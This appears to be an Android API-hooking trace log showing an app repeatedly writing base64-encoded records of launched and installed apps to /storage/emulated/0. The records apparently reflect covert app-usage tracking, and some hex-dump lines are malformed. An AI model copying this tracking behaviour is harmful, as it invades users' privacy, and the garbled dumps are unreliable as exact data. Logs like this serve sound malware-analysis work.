[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 33 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 2B 79 45 ....bm.o...j.+y.\n0010 70 4F 79 67 6C 56 30 6A 4D 41 3D 3D.\n0020 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 .\n [8144] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 29 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 76 73 68 4B 54 73 ...k......vsh..s\n0010 6F 4A 56 64 49 7A 55 3D 0A 3E 0D 0A..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 29 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 76 73 68 4B 54 73 ...k......vsh..s\n0010 6F 4A 56 64 49 7A 55 3D 0A 3E 0D 0A..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileInputStream.read.2] Read from file,offset,len ([unknow],0,335)
[336] bytes of zeroes
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 653 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 2B 71 79 ....bm.o...j.+qy\n0010 6A 4F 79 65 68 43 44 74 6D 4C 6E 73 6E 59 41 67 j.yeh..tm.nsn..g\n0020 37 4A 57 78 49 4F 71 79 67 4F 79 44 69 65 32 56 ......qyg.y.ie..\n0030 6D
4F 71 34 73 43 77 67 37 4A 32 34 37 59 53 77 m.q.s.wg.......w\n0040 36 34 53 33 4C 43 42 55 62 32 39 73 0A 63 79 77 ........b..s.cyw\n0050 67 36 34 57 35 37 49 71 6B 49 4F 79 56 73 53 44 g......qk..y.s..\n0060 73 69 71 54
74 68 71 44 73 6C 72 51 73 49 46 74 siq.thq.slr.s..t\n0070 51 51 31 33 72 6B 35 7A 72 6E 70 6A 71 73 36 54 ....rk.zrnpjqs..\n0080 73 6C 35 44 73 6C 72 51 67 4F 69 44 73 75 61 6A sl..slr.g.i.suaj\n0090 72 72 4C 58 73 6E 5A
67 67 0A 37 49 75 67 4C 43 rr..sn.gg...ug..\n00a0 42 47 59 57 4E 6C 59 6D 39 76 61 79 77 67 56 57 .....l.m.vaywg..\n00b0 35 6A 63 6D 46 6A 61 32 46 69 62 47 55 78 4C 43 .jcm.ja..ib.....\n00c0 42 51 59 58 6C 75 62 33 64 43
61 58 6F 73 49 45 ....lub.d.a.os..\n00d0 6C 75 61 6E 56 79 5A 57 52 42 62 6D 52 79 62 32 luan.y....bm.yb.\n00e0 6C 6B 4C 43 42 53 0A 62 32 39 30 49 45 4E 6C 63 lk.....b......lc\n00f0 6E 52 70 5A 6D 6C 6A 59 58 52 6C 49 45
31 68 62 n.p.mlj...l...hb\n0100 6D 46 6E 5A 58 49 73 49 45 46 75 5A 48 4A 76 52 m.n...s...u...v.\n0110 32 39 68 64 43 41 74 49 45 6C 75 63 32 56 6A 64 ..hd..t..luc..jd\n0120 58 4A 6C 49 45 46 77 63 43 41 6F 53 32 39 30 62
..l...wc..o....b\n0130 47 6C 75 0A 4B 53 77 67 59 6E 4A 68 5A 47 56 7A .lu...wg.n.h...z\n0140 59 32 38 73 49 4F 75 68 6E 4F 75 54 6E 43 44 72 ...s..uhn.u.n..r\n0150 71 71 6A 72 73 4A 54 73 6E 62 77 36 49 4F 32 44 qqjrs..snbw.....\n0160 67 4F 79 62 6A 43 44 72 6C 4A 54 74 6A 70 7A 73 g.ybj..rl..tjpzs\n0170 69 71 51 73 49 4F 79 61 6C 4F 71 30 74 43 44 72 iq.s..yal.q.t..r\n0180 0A 73 6F 7A 72 71 71 6E 71 76 72 77 36 49 4F 79 .sozrqqnqvrw...y\n0190 59 67 65 79 77 71 4F 79 59 67 65 79 77 71 43 77 .geywq.y.geywq.w\n01a0 67 36 37 4F 30 36 36 79 38 37 4A 32 30 37 4A 57 g......y........\n01b0 38 49 4F 75 57 71 4F 79 57 74 4F 79 67 75 4F 75 ...u.q.y.t.ygu.u\n01c0 64 76 43 77 67 37 4C 32 63 49 4F 79 59 0A 70 4F dv.wg...c..y..p.\n01d0 75 34 6A 43 44 72 6B 35 7A 72 6E 70 6A 71 73 36 u.j..rk.zrnpjqs.\n01e0 54 73 70 6F 67 73 49 4F 71 77 6E 4F 32 4D 6B 4F .spogs..qwn...k.\n01f0 79 59 70 4F 75 32 68 4F 79 67 68 43 77 67 36 34 y.p.u.h.ygh.wg..\n0200 32 77 36 37 69 55 54 53 77 67 37 5A 53 38 36 36 .w..i...wg......\n0210 65 64 49 4F 32 50 72 4F 79 37 0A 70 44 6F 67 37 ed....r.y..p.og.\n0220 4C 6D 30 37 4B 65 41 36 34 57 34 49 4F 75 68 6E .m...e.......uhn\n0230 4F 79 57 68 43 67 33 37 59 2B 73 37 4C 75 6B 4C .y.h.g...+s..uk.\n0240 4F 75 68 6E 4F 79 61 73 4F 75 77 6C 4F 75 52 6B .uhn.yas.uwl.u.k\n0250 65 79 64 74 43 7A 74 6C 5A 6A 73 6E 62 54 72 6F eydt.ztl.jsnb.ro\n0260 5A 7A 73 6D 72 41 70 0A 4C 43 44 72 73 4A 54 73 .zsmr.p....rs..s\n0270 6E 62 54 74 67 72 6B 67 36 35 32 38 37 4A 32 30 nb.tgrkg........\n0280 37 4B 61 49 58 53 4D 31 0A 3E 0D 0A 0A..\n00 0 [7536] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileInputStream.read.2] Read from file,offset,len ([unknow],0,332)
[336] bytes of zeroes
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileInputStream.read.2] Read from file,offset,len ([unknow],0,332)
[336] bytes of zeroes
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 21 bytes from 0 ([unknow]):
0000 37 49 53 6B 37 4B 43 56 49 31 74 64 49 7A 41 3D ...k......td.z..\n0010 0A 3E 0D 0A 0A 00 00 00 00 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileInputStream.read.2] Read from file,offset,len ([unknow],0,332)
[336] bytes of zeroes
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 41 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 2B 32 5A ....bm.o...j.+..\n0010 69 43 44 74 6D 5A 54 72 71 62 51 67..\n53 3 [8144] bytes of zeroesn0020 58 53 4D 31 0A 3E 0D 0A 0A 00 00 00 00 00 00 00 ......
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 41 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 2B 32 5A ....bm.o...j.+..\n0010 69 43 44 74 6D 5A 54 72 71 62 51 67..\n53 3 [8144] bytes of zeroesn0020 58 53 4D 31 0A 3E 0D 0A 0A 00 00 00 00 00 00 00 ......
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 37 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 42 68 ....bm.o...j...h\n0010 65 57 35 76 64 30 4A 70 65 6C 30 6A..\n41 3 [8144] bytes of zeroesn0020 0A 3E 0D 0A 0A 00 00 00 00 00 00 00 00 00 00 00 ..
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 41 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 41 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileInputStream.read.2] Read from file,offset,len ([unknow],0,332)
[336] bytes of zeroes
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 55 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 41 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 41 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 41 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 41 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 41 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 55 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 41 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
